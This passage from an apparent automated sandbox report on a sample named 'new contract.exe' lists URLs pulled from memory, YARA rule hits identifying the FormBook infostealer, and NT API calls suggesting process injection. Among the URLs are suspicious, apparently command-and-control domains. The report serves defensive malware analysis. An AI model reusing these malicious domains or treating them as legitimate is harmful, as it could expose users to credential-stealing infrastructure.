          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.x-design-courses-29670.bond
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.x-design-courses-29670.bond/c89p/
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.x-design-courses-29670.bond/c89p/www.oviepicker.net
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.x-design-courses-29670.bondReferer:
          Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: explorer.exe, 00000003.00000002.4141038919.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1762772794.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000003.00000003.3484154679.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1745295797.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108475652.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
          Source: explorer.exe, 00000003.00000003.3484154679.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1745295797.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108475652.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
          Source: explorer.exe, 00000003.00000000.1762772794.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4141038919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000003.00000000.1752045440.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108632093.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000003.00000000.1752045440.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108632093.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
          Source: explorer.exe, 00000003.00000000.1743468048.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1744290511.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4129060379.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130757516.0000000003700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000003.00000000.1752045440.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108632093.0000000009701000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1752045440.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108632093.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000003.00000000.1752045440.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108632093.0000000009701000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
          Source: explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
          Source: explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000003.00000000.1745295797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
          Source: explorer.exe, 00000003.00000000.1745295797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
          Source: explorer.exe, 00000003.00000000.1762772794.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4141038919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
          Source: explorer.exe, 00000003.00000000.1745295797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
          Source: explorer.exe, 00000003.00000000.1762772794.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4141038919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
          Source: explorer.exe, 00000003.00000000.1762772794.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4141038919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000003.00000000.1762772794.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4141038919.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
          Source: explorer.exe, 00000003.00000000.1762772794.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4141038919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
          Source: explorer.exe, 00000003.00000000.1745295797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
          Source: explorer.exe, 00000003.00000002.4133315277.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.new contract.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.new contract.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.new contract.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.new contract.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.4142928612.000000000E4FB000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: new contract.exe PID: 7424, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: new contract.exe PID: 7648, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: NETSTAT.EXE PID: 7732, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0041A320 NtCreateFile,2_2_0041A320
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0041A3D0 NtReadFile,2_2_0041A3D0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0041A450 NtClose,2_2_0041A450
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0041A500 NtAllocateVirtualMemory,2_2_0041A500
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0041A2DA NtCreateFile,2_2_0041A2DA
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0041A44A NtClose,2_2_0041A44A
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01662B60 NtClose,LdrInitializeThunk,2_2_01662B60
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01662BF0 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_01662BF0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01662AD0 NtReadFile,LdrInitializeThunk,2_2_01662AD0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01662D30 NtUnmapViewOfSection,LdrInitializeThunk,2_2_01662D30
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01662D10 NtMapViewOfSection,LdrInitializeThunk,2_2_01662D10
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01662DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_01662DF0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01662DD0 NtDelayExecution,LdrInitializeThunk,2_2_01662DD0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01662C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_01662C70
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01662CA0 NtQueryInformationToken,LdrInitializeThunk,2_2_01662CA0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01662F30 NtCreateSection,LdrInitializeThunk,2_2_01662F30
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01662FE0 NtCreateFile,LdrInitializeThunk,2_2_01662FE0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01662FB0 NtResumeThread,LdrInitializeThunk,2_2_01662FB0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01662F90 NtProtectVirtualMemory,LdrInitializeThunk,2_2_01662F90
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01662EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_01662EA0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01662E80 NtReadVirtualMemory,LdrInitializeThunk,2_2_01662E80
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01664340 NtSetContextThread,2_2_01664340
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01664650 NtSuspendThread,2_2_01664650
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01662BE0 NtQueryValueKey,2_2_01662BE0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01662BA0 NtEnumerateValueKey,2_2_01662BA0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01662B80 NtQueryInformationFile,2_2_01662B80
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01662AF0 NtWriteFile,2_2_01662AF0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01662AB0 NtWaitForSingleObject,2_2_01662AB0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01662D00 NtSetInformationFile,2_2_01662D00
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01662DB0 NtEnumerateKey,2_2_01662DB0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01662C60 NtCreateKey,2_2_01662C60
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01662C00 NtQueryInformationProcess,2_2_01662C00
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01662CF0 NtOpenProcess,2_2_01662CF0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01662CC0 NtQueryVirtualMemory,2_2_01662CC0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01662F60 NtCreateProcessEx,2_2_01662F60
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01662FA0 NtQuerySection,2_2_01662FA0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01662E30 NtWriteVirtualMemory,2_2_01662E30
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01662EE0 NtQueueApcThread,2_2_01662EE0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01663010 NtOpenDirectoryObject,2_2_01663010
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01663090 NtSetValueKey,2_2_01663090
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016635C0 NtCreateMutant,2_2_016635C0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016639B0 NtGetContextThread,2_2_016639B0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01663D70 NtOpenThread,2_2_01663D70
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01663D10 NtOpenProcessToken,2_2_01663D10
